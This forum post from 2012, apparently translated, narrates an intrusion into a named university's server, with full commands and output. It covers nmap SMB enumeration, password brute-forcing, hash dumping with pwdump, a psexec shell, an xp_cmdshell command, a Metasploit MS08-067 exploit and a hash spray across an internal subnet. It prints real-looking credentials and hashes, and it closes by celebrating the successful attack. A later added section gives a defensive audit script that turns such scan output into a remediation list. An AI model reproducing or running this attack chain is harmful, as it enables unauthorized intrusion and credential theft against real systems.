nmap+msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan results

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
& @! H3 G) l4 p( u) W
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
5 k9 [. N* k$ h0 a6 f
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
: V) P, J/ C' A" J' D
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
- E$ m- P  B+ l2 P+ M1 C+ ]  m
root@bt:~# msfconsole    // exploit the ms08-067 vulnerability against the target machine from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
$ n6 _6 Y0 F5 E3 j7 ?% T
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in to the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
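Added example, not part of the original post: an audit script written from the defender's side that reads NSE host-script output in the shape shown above (smb-enum-shares, smb-brute, smb-check-vulns, smb-pwdump) and lists every exposure the scan revealed and that should be remediated: anonymous IPC$ access, blank or guessed passwords, the missing MS08-067 patch, and LM hash storage (an LM hash whose second half is the empty-block constant AAD3B435B51404EE also tells an auditor the password is 7 characters or fewer). It handles any share name or vulnerability id the scripts report; the sample output is constructed, and the function name and constant are this example's own.

```python
import re

# Constructed sample in the shape of the NSE host-script output in the post; not a real scan.
SAMPLE_NMAP_OUTPUT = """\
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
"""

# LM hashes DES-encrypt two 7-byte halves of the password; this constant is the
# hash of an empty half, so an LM hash ending in it belongs to a password of <= 7 chars.
LM_EMPTY_HALF = "AAD3B435B51404EE"


def audit_smb_findings(text):
    """Return one finding string per exposure a defender should fix, in output order."""
    findings, section, share = [], None, None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()            # drop the NSE tree prefix
        if line.startswith("smb-") and line.endswith(":"):
            section = line[:-1]                       # e.g. "smb-brute"
        elif section == "smb-enum-shares":
            if not line.startswith("Anonymous access:"):
                share = line                          # a share name precedes its access line
            elif (access := line.split(":", 1)[1].strip()) != "<none>":
                findings.append(f"share {share} allows anonymous {access}")
        elif section == "smb-brute":
            if m := re.match(r"(\S+):(\S*) => Login was successful", line):
                how = "a blank password" if m.group(2) == "<blank>" else "a password smb-brute guessed"
                findings.append(f"account {m.group(1)} has {how}")
        elif section == "smb-check-vulns":
            if m := re.match(r"(\S+): VULNERABLE", line):
                findings.append(f"host is unpatched for {m.group(1)}")
        elif section == "smb-pwdump":
            if m := re.match(r"(\S+):(\d+) => ([^:]+):", line):
                user, rid, lm = m.groups()
                if lm.startswith("NO PASSWORD"):
                    findings.append(f"account {user} (RID {rid}) has an empty password")
                else:  # any LM hash at all means LM hash storage is still enabled
                    short = " (password is 7 characters or fewer)" if lm.upper().endswith(LM_EMPTY_HALF) else ""
                    findings.append(f"account {user} (RID {rid}) stores an LM hash{short}")
    return findings
```

Feed it the saved output of `nmap --script=smb-*` runs (for example via `nmap -oN`) to turn a scan like the one above into a remediation list.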
